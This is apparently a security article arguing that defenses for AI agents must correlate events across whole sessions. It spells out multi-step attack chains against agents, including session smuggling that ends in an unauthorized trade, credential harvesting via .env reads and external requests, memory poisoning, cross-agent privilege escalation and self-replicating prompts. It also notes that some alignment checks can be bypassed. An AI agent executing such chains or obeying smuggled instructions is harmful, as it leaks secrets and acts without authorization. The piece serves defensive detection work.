In March 2025, researchers demonstrated that Microsoft's own multi-agent framework Magentic-One executes arbitrary malicious code 97% of the time when a compromised file enters the pipeline. Not because any single request was obviously malicious, but because the attack unfolded across multiple steps, each one looking perfectly normal in isolation.
This is the fundamental problem with today’s AI security: we’re checking each request individually while attackers are thinking in sequences.
The Attack That Looks Normal
Here’s a real attack pattern documented by Palo Alto Unit 42’s research on Google’s A2A protocol:
Turn 1: Research agent asks financial agent a normal question
Turn 2: Financial agent responds with its capabilities
Turn 3: Research agent asks a follow-up that subtly probes system instructions
Turn 4: Financial agent leaks tool configuration
Turn 5: Research agent smuggles a hidden instruction
Turn 6: Financial agent executes an unauthorized stock trade
Each individual message passes every content filter. No prompt injection detected. No sensitive data in transit. No dangerous tool call. But the sequence is a textbook social engineering attack — reconnaissance, trust building, exploitation.
Unit 42 calls this Agent Session Smuggling. It exploits A2A’s stateful protocol design: agents remember previous context, allowing attackers to refine their approach across turns.
Agents Replay the APT Playbook
If you’ve worked in traditional security, this should sound familiar. It’s the same kill chain that APT groups have used for decades — just with a new attack surface.
Harvard’s Berkman Klein Center formalized this as the Promptware Kill Chain (arXiv:2601.09625), mapping it directly to the MITRE ATT&CK framework:
| ATT&CK Phase | Traditional Attack | Agent Attack Equivalent |
|---|---|---|
| Reconnaissance | Port scanning, OSINT | Enumerating available tools, probing agent capabilities |
| Initial Access | Phishing email | Prompt injection via malicious document, email, or web content |
| Execution | Malware execution | Tool call executing malicious operation |
| Persistence | Registry keys, cron jobs | Memory poisoning, RAG data contamination |
| Privilege Escalation | Kernel exploit | Jailbreak, confused deputy attack |
| Lateral Movement | Pass-the-hash, RDP | Cross-agent message manipulation, self-replicating prompts |
| Exfiltration | C2 channel | Data sent via URL fetch, email tool, or search query |
This isn’t theoretical. Anthropic reported the first real-world AI-orchestrated cyber espionage campaign (GTG-1002), detected in mid-September 2025: a state-sponsored group used a jailbroken agent to autonomously complete 80-90% of a complex intrusion, including credential extraction, system analysis, and data exfiltration across roughly 30 targets.
Why Request-Level Detection Fails
Every major AI security product today operates at the request level:
Request comes in → scan for prompt injection → scan for PII → pass/block
Response comes back → scan for sensitive data → pass/block
Forget everything → next request starts fresh
This catches the obvious stuff. But it structurally cannot detect:
1. Credential Harvesting Chains
Turn 2: read_file("~/.env") ← Normal. Developers read configs.
Turn 5: curl POST https://external ← Normal. Apps make HTTP requests.
Together: read secrets → exfiltrate ← Attack.
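The failure mode above can be made concrete with a minimal sketch. The rule set and function below are illustrative assumptions, not any real product's API; the point is only that a stateless per-request check necessarily passes both steps:

```python
# Sketch: a request-level filter sees each tool call in isolation.
# BLOCKED_CALLS and request_level_check are hypothetical names.

BLOCKED_CALLS = {("exec", "rm -rf /")}  # only individually dangerous calls

def request_level_check(tool: str, arg: str) -> bool:
    """Pass/block a single call with no memory of earlier calls."""
    return (tool, arg) not in BLOCKED_CALLS

# Turn 2: reading a config file is routine for a dev assistant.
assert request_level_check("read_file", "~/.env")
# Turn 5: an outbound HTTP request is routine for a web-enabled agent.
assert request_level_check("url_fetch", "https://attacker.example/collect")
# Both pass. Only the sequence read_file(.env) -> url_fetch(external)
# is the credential-harvest attack; a stateless filter cannot see it.
```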
2. Slow Data Exfiltration
An attacker doesn’t steal everything at once. They take one piece per session — an API key today, a database password tomorrow, a customer list next week. Each individual access looks routine. Security researchers call this salami slicing: 10 support tickets over a week, each slightly redefining agent constraints, until unauthorized actions become “normal.”
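Catching slow exfiltration requires aggregating across sessions, not within one. A minimal sketch, with purely assumed threshold values and class names:

```python
# Sketch: per-session access counts look routine; the cross-session
# aggregate reveals slow exfiltration. Thresholds are assumptions.
from collections import defaultdict

PER_SESSION_LIMIT = 3  # 1-2 secret reads in a session is plausible
WEEKLY_LIMIT = 5       # the same principal draining secrets all week is not

class ExfilTracker:
    def __init__(self):
        self.weekly = defaultdict(int)  # principal -> sensitive reads this week

    def record(self, principal: str, session_reads: int) -> str:
        self.weekly[principal] += session_reads
        if session_reads > PER_SESSION_LIMIT:
            return "alert"  # request-level tools already catch this
        if self.weekly[principal] > WEEKLY_LIMIT:
            return "alert"  # only temporal correlation catches this
        return "ok"

tracker = ExfilTracker()
# One secret per session, seven sessions: each looks routine...
results = [tracker.record("agent-42", 1) for _ in range(7)]
# ...but the aggregate crosses the weekly threshold partway through.
assert results[:5] == ["ok"] * 5 and results[5] == "alert"
```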
3. Memory Poisoning with Delayed Triggers
Palo Alto Unit 42 demonstrated that injected content can sit dormant in agent memory for days or weeks, only activating when an unrelated interaction triggers it. Their research found that once memory is poisoned, 87% of downstream decisions become compromised within 4 hours of the trigger event. Unlike prompt injection (which disappears when the session ends), memory poisoning creates persistent compromise.
4. Cross-Agent Privilege Escalation
In multi-agent systems, a low-privilege agent can manipulate a high-privilege agent into acting on its behalf. The COLM 2025 paper showed this works even when individual agents refuse unsafe operations — by manipulating the orchestrator’s scheduling metadata (particularly error reports), attackers hijack the entire system’s control flow.
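One classic mitigation for the confused deputy is to authorize cross-agent requests with the minimum privilege along the call chain, so a low-privilege agent cannot launder an action through a high-privilege one. A sketch under an entirely assumed privilege model (the agent names, levels, and `authorize` function are illustrative):

```python
# Sketch: confused-deputy prevention by propagating the originating
# caller's privilege on cross-agent requests. All values hypothetical.

PRIV = {"research_agent": 1, "finance_agent": 3}
REQUIRED = {"execute_trade": 3, "get_quote": 1}

def authorize(action: str, call_chain: list[str]) -> bool:
    """Authorize with the minimum privilege along the chain."""
    effective = min(PRIV[a] for a in call_chain)
    return effective >= REQUIRED[action]

# Direct call by the finance agent: allowed.
assert authorize("execute_trade", ["finance_agent"])
# Same action requested via the research agent: the chain's minimum
# privilege (1) is below the requirement (3), so it is denied even
# though the finance agent alone could perform it.
assert not authorize("execute_trade", ["research_agent", "finance_agent"])
```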
What the Research Says About Detection
Academic and industry research is converging on one conclusion: detection must be session-level, not request-level.
ControlValve (Microsoft Research, 2025)
Microsoft’s own answer to the Magentic-One vulnerability. Instead of checking individual requests, ControlValve generates permitted control-flow graphs for multi-agent systems — a whitelist of allowed execution sequences. Any deviation triggers an alert. This is directly borrowed from Control-Flow Integrity (CFI) in systems security, adapted for agent orchestration.
Key property: it’s zero-shot and task-agnostic. No training data needed, works across different agent configurations.
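The CFI analogy can be sketched in a few lines: a whitelist of permitted agent-to-agent transitions, with any edge outside the graph raising an alert. This illustrates the concept only, not ControlValve's actual implementation; the agent names and edge set are assumptions:

```python
# Sketch of the CFI-style idea: a whitelist of permitted
# agent-to-agent transitions; deviations trigger an alert.

PERMITTED_EDGES = {
    ("orchestrator", "web_surfer"),
    ("web_surfer", "orchestrator"),
    ("orchestrator", "file_reader"),
    ("file_reader", "orchestrator"),
}

def check_transition(src: str, dst: str) -> None:
    if (src, dst) not in PERMITTED_EDGES:
        raise RuntimeError(f"control-flow violation: {src} -> {dst}")

# A normal delegation passes silently:
check_transition("orchestrator", "web_surfer")
# A hijacked flow (e.g. web_surfer invoking file_reader directly,
# steered by a malicious page) deviates from the graph and is caught:
try:
    check_transition("web_surfer", "file_reader")
except RuntimeError as e:
    print(e)
```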
LlamaFirewall (Meta, 2025)
Meta’s open-source guardrail includes Agent Alignment Checks — the first real-time audit of an agent’s chain-of-thought reasoning. It reduced attack success rates by 90%.
But here’s the catch: the ControlValve paper demonstrated that LlamaFirewall’s alignment checks can be bypassed by carefully constructed attack sequences. Single-step alignment verification isn’t enough when attackers think in multi-step chains.
OWASP Top 10 for Agentic Applications (2025)
Three of the top 10 risks directly relate to chain attacks:
- ASI06 (Memory & Context Manipulation): Memory poisoning as the persistence layer for cross-session attacks
- ASI07 (Insecure Inter-Agent Communication): Forged agent messages enabling lateral movement
- ASI08 (Cascading Failures): Small misalignments amplifying into system-wide failures across agent chains
From the OWASP report:
“Agentic systems chain decisions and actions across multiple steps, and small inaccuracies compound and propagate, so what begins as a minor misalignment in one agent can trigger a system-wide outage.”
MITRE ATLAS Update (October 2025)
MITRE added 14 agent-specific attack techniques to their ATLAS framework, developed in collaboration with Zenity Labs. New entries include AI Agent Context Poisoning, Memory Manipulation, Thread Injection, and Modify AI Agent Configuration — all multi-step attack patterns that require temporal correlation to detect.
Chain Detection: The Missing Layer
The gap in today’s AI security stack is clear:
| Existing Defense | What It Catches | What It Misses |
|---|---|---|
| PI detection (PromptGuard, etc.) | Single-request injection | Multi-step sequences |
| LlamaFirewall alignment check | Single-step goal deviation | Carefully crafted sequences that bypass alignment |
| DLP scanning | Single-request data leakage | Slow exfiltration across sessions |
| Tool Guard rules | Individual dangerous tool calls | Combinations of harmless calls that form an attack |
What’s missing is a layer that correlates signals across time:
Event timeline for Session X:
t=0  Normal conversation                score: 0
t=3  PI detection triggered             score: +30
t=5  Sensitive file accessed            score: +10
t=7  DLP found API key in content       score: +20
t=9  External HTTP request attempted    score: +40
     ─────────
t=9  Chain rule "credential-harvest" matched
     (read .env → external request)     score: 100 → BLOCK
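The timeline above can be expressed as a stateful session scorer. The signal weights and the chain rule are illustrative assumptions taken from the timeline, not a real product's configuration:

```python
# Sketch: a session scorer that accumulates signal weights across
# turns and fires a chain rule on a matching sequence.

SIGNAL_WEIGHTS = {
    "pi_detected": 30,
    "sensitive_file_read": 10,
    "dlp_api_key": 20,
    "external_http": 40,
}

class SessionScorer:
    def __init__(self):
        self.score = 0
        self.signals: list[str] = []

    def observe(self, signal: str) -> str:
        self.score += SIGNAL_WEIGHTS.get(signal, 0)
        self.signals.append(signal)
        # Chain rule "credential-harvest": a secret was read earlier
        # in this session and an external request now follows.
        if "sensitive_file_read" in self.signals and signal == "external_http":
            self.score = 100
            return "BLOCK"
        return "ALLOW"

s = SessionScorer()
events = ["pi_detected", "sensitive_file_read", "dlp_api_key", "external_http"]
verdicts = [s.observe(e) for e in events]
assert verdicts == ["ALLOW", "ALLOW", "ALLOW", "BLOCK"]
assert s.score == 100
```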
This is the same architectural pattern as EDR behavioral detection. CrowdStrike’s Falcon agent doesn’t just check if a single system call is malicious — it evaluates sequences of operations over time: “login from new IP → disable antivirus → inject code” is a pattern, not three independent events.
SentinelOne’s Storyline technology automatically maps event sequences into visual attack chains, tracking the full attack path from initial compromise to impact. The equivalent for agents is mapping tool call sequences into attack chain timelines — detecting the pattern, not just the individual events.
The Six Chain Patterns
Based on documented attacks, PoCs, and academic research, these are the chain patterns that matter most:
1. Credential Harvesting
read_file(.env/.aws/credentials) → url_fetch(external) or send_email
Source: arXiv:2510.09093, real-world CVE-2025-68664
2. Data Exfiltration
list_files → read_file(sensitive) × N → write_file or send_email
Source: Unit 42 session smuggling PoC
3. Reconnaissance → Extract
list_tools → read_config → system_info → targeted exploitation
Source: Anthropic GTG-1002 campaign
4. Memory Poisoning
Injected content → [days/weeks dormant] → triggered behavioral change
Source: Unit 42 memory poisoning research, MINJA (NeurIPS)
5. Privilege Escalation
Low-privilege data read → call to high-privilege agent → execute privileged action
Source: COLM 2025, SEAgent framework
6. Self-Replication
read_message → generate_reply_with_payload → send_message
Source: Morris II worm (arXiv:2403.02817)
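A pattern library like the one above can be matched as ordered subsequences of a session's tool-call log. The signature names follow the list; the matching logic itself is an illustrative assumption, not a documented detector:

```python
# Sketch: chain patterns as ordered tool-call signatures, matched as
# subsequences of a session's call log.

CHAIN_SIGNATURES = {
    "credential-harvest": ["read_file", "url_fetch"],
    "data-exfiltration": ["list_files", "read_file", "send_email"],
    "recon-extract": ["list_tools", "read_config", "system_info"],
    "self-replication": ["read_message", "generate_reply", "send_message"],
}

def is_subsequence(sig: list[str], log: list[str]) -> bool:
    # Consume the log iterator in order, requiring each step in turn.
    it = iter(log)
    return all(step in it for step in sig)

def match_chains(log: list[str]) -> list[str]:
    return [name for name, sig in CHAIN_SIGNATURES.items()
            if is_subsequence(sig, log)]

# Each call is individually benign; the ordered combination is not.
session_log = ["list_files", "read_file", "read_file", "send_email"]
assert match_chains(session_log) == ["data-exfiltration"]
```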
Where We Go From Here
Chain detection for AI agents is where behavioral detection was for endpoint security in 2012 — everyone agrees it’s needed, few have built it, and the early movers will define the category.
The technical requirements are clear:
- Stateful session tracking — maintain context across turns, not just individual requests
- Temporal correlation — detect patterns that span minutes, hours, or days
- Graduated response — not binary pass/block, but progressive threat scoring with escalating restrictions
- Pattern library — a growing database of known attack chain signatures, updated from real-world incidents
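The graduated-response requirement, in particular, is easy to sketch: a session threat score maps to escalating restrictions rather than a binary verdict. The thresholds and tier names below are assumptions for illustration:

```python
# Sketch: graduated response tiers keyed to a session threat score.
# Thresholds and restriction tiers are illustrative assumptions.

def response_tier(score: int) -> str:
    if score >= 80:
        return "block_session"     # terminate and quarantine context
    if score >= 50:
        return "require_approval"  # human-in-the-loop for tool calls
    if score >= 25:
        return "restrict_tools"    # disable network/file-write tools
    return "monitor"               # log only

assert response_tier(10) == "monitor"
assert response_tier(30) == "restrict_tools"
assert response_tier(60) == "require_approval"
assert response_tier(95) == "block_session"
```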
The research is there. The attack patterns are documented. The question is who builds the detection layer that connects the dots.
References
Academic Papers
- Wu et al., “Multi-Agent Systems Execute Arbitrary Malicious Code,” COLM 2025.
- Wu & Shmatikov, “Breaking and Fixing Defenses Against Control-Flow Hijacking in Multi-Agent Systems,” arXiv:2510.17276. Microsoft Research
- “The Promptware Kill Chain,” arXiv:2601.09625. Harvard Berkman Klein Center / Lawfare.
- Cohen et al., “Here Comes The AI Worm,” arXiv:2403.02817.
- “LlamaFirewall,” arXiv:2505.03574. Meta AI.
- Kim et al., “Prompt Flow Integrity,” arXiv:2503.15547. Seoul National University.
- “SEAgent: Mandatory Access Control for LLM Agents,” arXiv:2601.11893.
- “Exploiting Web Search Tools of AI Agents for Data Exfiltration,” arXiv:2510.09093.
Industry Reports & Frameworks
- OWASP Top 10 for Agentic Applications, December 2025.
- MITRE ATLAS + Zenity Labs agent-specific techniques, October 2025.
- CSA MAESTRO Threat Modeling Framework.
- NIST AI Agent Standards Initiative, February 2026.
- AWS Agentic AI Security Scoping Matrix.
Real-World Incidents
- Anthropic, “Disrupting the first AI-orchestrated cyber espionage campaign” (GTG-1002).
- CVE-2025-68664 (LangGrinch), CVSS 9.3. NVD.
- Invariant Labs, MCP Tool Poisoning Attacks.
- Unit 42, Agent Session Smuggling in A2A Systems.
- Unit 42, Indirect Prompt Injection Poisons AI Long-term Memory.